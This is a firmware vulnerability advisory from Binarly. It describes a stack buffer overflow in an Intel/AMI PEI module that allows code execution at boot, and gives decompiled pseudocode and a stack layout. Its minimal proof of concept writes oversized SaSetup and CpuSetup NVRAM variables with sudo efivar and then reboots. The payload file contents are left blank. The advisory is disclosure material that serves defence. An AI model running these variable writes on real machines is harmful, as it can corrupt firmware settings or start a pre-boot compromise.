[BRLY-2022-027] The stack buffer overflow vulnerability leads to arbitrary code execution during PEI phase on Intel platform.

Summary

Binarly REsearch Team has discovered a stack buffer overflow vulnerability on Intel platforms allowing a possible attacker to execute arbitrary code during PEI phase.

Vulnerability Information

• BINARLY internal vulnerability identifier: BRLY-2022-027
• Intel PSIRT assigned CVE identifier: CVE-2022-28858
• AMI PSIRT assigned CVE identifier: CVE-2022-26873
• CERT/CC assigned case number: VU#158026
• FwHunt rule: BRLY-2022-027
• CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Affected Intel firmwares with confirmed impact by Binarly REsearch Team

Potential impact

A potential attacker can execute an arbitrary code at the time of the PEI phase and influence the subsequent boot stages. This can lead to the mitigasions bypassing, physical memory contents disclosure, discovery of any secrets from any Virtual Machines (VMs) and bypassing memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload which can be injected into the SMRAM memory.

Vulnerability description

The pseudocode for vulnerable function is shown below:

int __thiscall sub_FFAE2B82(void *this)
{
  ...
  const EFI_PEI_SERVICES **PeiServices;
  char CpuSetupData[1072];
  UINTN DataSize;
  EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;

  ...
  DataSize = 1072;
  Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
  Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
  ...
  return 0;
}

If the value of the SaSetup NVRAM variable is larger than 1072 bytes, then after the first call of the Ppi->GetVariable() service, the DataSize value will be overwritten with the real size of the SaSetup NVRAM variable.

After second call of the Ppi->GetVariable() service stack overflow may occur.An overflow of 24 bytes is enough to execute arbitrary code:

-00000440 CpuSetupData    db 1072 dup(?)
-00000010 var_10          db ?
-0000000F                 db ? ; undefined
-0000000E var_E           dd ?
-0000000A                 db ? ; undefined
-00000009                 db ? ; undefined
-00000008 DataSize        dd ?
-00000004 Ppi             dd ?                    ; offset
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)

Minimal POC

sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot

The data in the file SaSetupData_new.bin may be as follows:

The data in the file CpuSetupData_new.bin may be as follows:

Disclosure timeline

This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.

Acknowledgements

Binarly REsearch Team